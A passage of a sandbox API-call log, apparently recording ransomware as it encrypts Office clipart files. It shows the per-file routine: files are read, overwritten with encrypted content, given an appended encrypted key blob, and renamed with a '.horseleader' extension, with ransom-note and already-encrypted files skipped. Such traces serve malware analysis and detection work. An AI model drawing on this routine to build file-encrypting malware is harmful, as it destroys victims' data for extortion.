lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf38, lpOverlapped=0x0) returned 1 [0253.733] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff0c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.733] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf38, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf38, lpOverlapped=0x0) returned 1 [0253.733] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.733] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.734] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.734] CloseHandle (hObject=0x158) returned 1 [0253.734] GetProcessHeap () returned 0x780000 [0253.734] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.734] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.horseleader") returned 79 [0253.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.horseleader")) returned 1 [0253.735] GetProcessHeap () returned 0x780000 [0253.735] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.735] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21757d00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21757d00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00445_.WMF", cAlternateFileName="")) returned 1 [0253.735] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="Windows") returned -1 [0253.735] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 67 [0253.735] StrStrIW (lpFirst="BS00445_.WMF", lpSrch=".horseleader") returned 0x0 [0253.735] lstrcmpW (lpString1="BS00445_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.735] lstrcmpW (lpString1="BS00445_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.735] lstrlenW (lpString=".testttjffg") returned 11 [0253.735] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.735] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.735] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.736] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 67 [0253.736] StrStrW (lpFirst="BS00445_.WMF", lpSrch=".txt") returned 0x0 [0253.736] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3796) returned 1 [0253.736] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0253.738] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff12c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.738] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xed4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0253.738] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.738] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.738] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.738] CloseHandle (hObject=0x158) returned 1 [0253.738] GetProcessHeap () returned 0x780000 [0253.738] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.738] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.horseleader") returned 79 [0253.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.horseleader")) returned 1 [0253.740] GetProcessHeap () returned 0x780000 [0253.740] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.740] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00453_.WMF", cAlternateFileName="")) returned 1 [0253.740] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="Windows") returned -1 [0253.740] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 67 [0253.740] StrStrIW (lpFirst="BS00453_.WMF", lpSrch=".horseleader") returned 0x0 [0253.740] lstrcmpW (lpString1="BS00453_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.740] lstrcmpW (lpString1="BS00453_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.740] lstrlenW (lpString=".testttjffg") returned 11 [0253.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.741] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.741] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 67 [0253.741] StrStrW (lpFirst="BS00453_.WMF", lpSrch=".txt") returned 0x0 [0253.741] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2436) returned 1 [0253.741] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x984, lpOverlapped=0x0) returned 1 [0253.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff67c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.744] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x984, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x984, lpOverlapped=0x0) returned 1 [0253.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.745] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.745] CloseHandle (hObject=0x158) returned 1 [0253.745] GetProcessHeap () returned 0x780000 [0253.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.horseleader") returned 79 [0253.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.horseleader")) returned 1 [0253.746] GetProcessHeap () returned 0x780000 [0253.746] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.746] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ba86700, ftCreationTime.dwHighDateTime=0x1bd4bea, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ba86700, ftLastWriteTime.dwHighDateTime=0x1bd4bea, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01080_.WMF", cAlternateFileName="")) returned 1 [0253.746] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="Windows") returned -1 [0253.747] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 67 [0253.747] StrStrIW (lpFirst="BS01080_.WMF", lpSrch=".horseleader") returned 0x0 [0253.747] lstrcmpW (lpString1="BS01080_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.747] lstrcmpW (lpString1="BS01080_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.747] lstrlenW (lpString=".testttjffg") returned 11 [0253.747] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.747] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.747] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.748] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 67 [0253.748] StrStrW (lpFirst="BS01080_.WMF", lpSrch=".txt") returned 0x0 [0253.748] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2732) returned 1 [0253.748] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xaac, lpOverlapped=0x0) returned 1 [0253.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff554, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.750] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xaac, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xaac, lpOverlapped=0x0) returned 1 [0253.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.750] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.750] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.751] CloseHandle (hObject=0x158) returned 1 [0253.751] GetProcessHeap () returned 0x780000 [0253.751] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.751] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.horseleader") returned 79 [0253.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.horseleader")) returned 1 [0253.752] GetProcessHeap () returned 0x780000 [0253.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.752] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d186600, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d186600, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1c08, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01603_.WMF", cAlternateFileName="")) returned 1 [0253.752] lstrcmpiW (lpString1="BS01603_.WMF", lpString2="Windows") returned -1 [0253.752] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 67 [0253.752] StrStrIW (lpFirst="BS01603_.WMF", lpSrch=".horseleader") returned 0x0 [0253.752] lstrcmpW (lpString1="BS01603_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.752] lstrcmpW (lpString1="BS01603_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.752] lstrlenW (lpString=".testttjffg") returned 11 [0253.752] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.752] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 67 [0253.754] StrStrW (lpFirst="BS01603_.WMF", lpSrch=".txt") returned 0x0 [0253.754] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7176) returned 1 [0253.754] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1c08, lpOverlapped=0x0) returned 1 [0253.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe3f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.756] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1c08, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1c08, lpOverlapped=0x0) returned 1 [0253.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.756] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.756] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.757] CloseHandle (hObject=0x158) returned 1 [0253.757] GetProcessHeap () returned 0x780000 [0253.757] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.757] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.horseleader") returned 79 [0253.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.horseleader")) returned 1 [0253.758] GetProcessHeap () returned 0x780000 [0253.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc31ccd00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc31ccd00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xda6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01634_.WMF", cAlternateFileName="")) returned 1 [0253.758] lstrcmpiW (lpString1="BS01634_.WMF", lpString2="Windows") returned -1 [0253.758] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 67 [0253.758] StrStrIW (lpFirst="BS01634_.WMF", lpSrch=".horseleader") returned 0x0 [0253.758] lstrcmpW (lpString1="BS01634_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.758] lstrcmpW (lpString1="BS01634_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.758] lstrlenW (lpString=".testttjffg") returned 11 [0253.758] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.758] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.758] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 67 [0253.759] StrStrW (lpFirst="BS01634_.WMF", lpSrch=".txt") returned 0x0 [0253.759] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3494) returned 1 [0253.759] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xda6, lpOverlapped=0x0) returned 1 [0253.761] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff25a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.761] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xda6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xda6, lpOverlapped=0x0) returned 1 [0253.761] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.762] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.762] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.762] CloseHandle (hObject=0x158) returned 1 [0253.762] GetProcessHeap () returned 0x780000 [0253.762] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.horseleader") returned 79 [0253.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.horseleader")) returned 1 [0253.763] GetProcessHeap () returned 0x780000 [0253.763] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.763] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bebd00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63bebd00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, 